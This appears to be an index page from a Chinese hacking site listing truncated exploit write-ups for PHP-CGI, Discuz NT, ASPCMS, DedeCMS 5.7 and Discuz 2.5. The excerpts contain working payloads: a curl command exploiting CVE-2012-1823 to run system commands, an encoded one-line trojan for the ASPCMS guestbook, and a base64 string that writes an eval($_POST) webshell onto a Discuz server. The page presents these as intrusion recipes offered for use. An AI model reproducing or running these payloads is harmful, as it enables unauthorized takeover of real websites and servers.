php-cgi漏洞利用EXP

  1、本地包含直接执行代码: curl -H "USER-AGENT: <?system('id');die();?>" https://www.webshell.cc/test.php?-dauto_prepend_file%3d/proc/self/environ+-n 2、远程包含执行代码: curl https://www.webshell.cc/test.php?-d...

- 阅读全文 -

Discuz NT 多个版本文件上传漏洞

文章作者:rebeyond 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。 受影响版本:貌似都受影响。 漏洞文件:tools/ajax.aspx 漏洞分析:这个页面里的ajax请求,都没有进行权限的验证,游客权限就可以调用其中的所有方法,...

- 阅读全文 -

CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RCE的PoC原文没...

- 阅读全文 -

最新的PHP补丁并不能修复漏洞

   星期三, 一個 PHP 远程代码执行漏洞被意外公开在网上, 引发了利用此漏洞可对大量网站实施入侵的恐慌. 该 bug 可以追溯到 2004 年, 在最近的 CTF 比赛中被暴露. ‘当 PHP 以 CGI 模式运行时 (如 Apache 的 mod_cgid), php-cgi 会接受处理一個查询字符串作为命令行参数以开启某些功能    如 -s, -d 或 -c 传递给 php-cgi, ...

- 阅读全文 -

ASPCMS数据库可插一句话!

aspcms主要是信息发布系统,影响版本为asp。   漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。   数据库默认配置为asp.目录在/data/data.asp下。   利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,九成的末更改: 在留言的标题处插入:┼攠數畣整爠煥敵瑳∨≡┩愾   这样就往...

- 阅读全文 -

织梦5.7注入加上传漏洞

会员中心查询会员信息语句过滤不严,导致url可提交注入参数; 会员中心有上传动作过滤不严,导致上传漏洞 详细说明: ①注入漏洞。 这站 https://www.webshell.cc/ 首先访问“/data/admin/ver.txt”页面获取系统最后升级时间, 然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图...

- 阅读全文 -

DZ!2.5 后台拿 WebShell 方法!

直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论...

- 阅读全文 -